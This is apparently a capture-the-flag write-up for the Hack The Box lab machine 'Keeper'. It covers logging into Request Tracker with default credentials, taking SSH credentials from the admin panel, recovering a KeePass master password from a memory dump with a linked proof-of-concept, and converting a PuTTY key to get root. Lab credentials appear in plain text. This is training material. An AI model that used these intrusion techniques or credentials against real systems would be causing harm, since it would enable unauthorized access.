Try   HackMD

hello hackers am back again, lets have a simple walkthroug with an easy box from SEASONAL 2 of hacking with HACK THE BOX, i was scared writting the writteups with these machine to avoid get suspendend from hacking.

As usually with hacking or pentesting methodology is what will save you.

lets begin hackers

STEP 1: SCANNING

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

as you can see above we have got two open port open but filtered mhmmmmmmmm.

STEP 2: ENUMERATION

Lets start enumerating one port after another

Port 22 is ssh, in order to access it we need credentials and we dont have here so we need to find another way in the target machine.

Port 80 is running http but seems is filtered, I was first scared since because if is the port is in filtered state we need to find a way to bypass it inorder to reach to the server, if we try to browser to the ip under port 80 it can be accessed men that was real cool for sure.

STEP 3: EXPLOITATION 3

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

It seems that we got here a domain and a subdomain lets add it to our /etc/hosts

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And when we try to click the redirection link it takes us to a login page

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The login page looks cool but i didn't want to go direct and try some other methodology of bypassing the login page, i knew that with this login page i dont need to brute force just some simple trick, normally HTB is trick so i started looking what is suspicious here with the login page.

You can google what is RT, and since we have a login page you can also try this one "RT defaults creds"

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

username:root
password:password

and try to input the creds

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Just found myself in, reall cool and hapy

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

If we check the Admin section there you can find something useful and cool, its the domain and username

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And finally we got something usefully
its a username and upon looking around found this

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

STEP 4: FOOTHOLDING
since we got the ssh creds we can try to gain remote access via ssh to the target machine.

email:lnorgaard@keeper.htb
password:Welcome2023!

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

STEP 5: PRIVILEGE ESCALATION

Lets have some fun time with root,it was really cool and simple

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

remember we saw a .zip file lets transfer to our local machine and have some deep diving with it.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Oky here we see two files, but the first dump file is the one contains the passcode for our way toward the database, so we need to dump theDumpFull.dmp file and see if we can get a passcode for the kdbx db.

After some search found the PoC and made a fork to myself so as i can easy get to it.

https://github.com/alien-keric/keepass-dump-masterkey.git

With the python script we can try to dump the keepass master-key like this

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

command: python poc.py KeePassDumpFile.dmp

Seems as some characters are missing here , i tried to google and see if i can get them.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

passcode: Rødgrød med Fløde (rødgrød med fløde)

NB: if you try the name as it is you actuall get an error so u need to change the uppercase letter into small letters and then submit it.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Opening the passcode.kdbx in windows is very simple but in linux you can just try to download a keepass2 so as to be able to open this file.

After submitting our passcode we get some files.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And if we click the first file you you will get this output

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Now the waiting is over, we see above under the notes section we have .perm file lets find a way we can convert to a .ppk file format

You can check here

https://repost.aws/knowledge-center/ec2-ppk-pem-conversion

NB: the main idea toward privilege escalation is ppk2pem.

first of all u have to install putty tools

command:sudo apt-get install putty-tools

And after that you can use the following command to convert the file

command: puttygen rsa.ppk -O private-openssh -o output.perm

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

And from there you can go and grab the flag of the root access

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

The machine was cool and really simple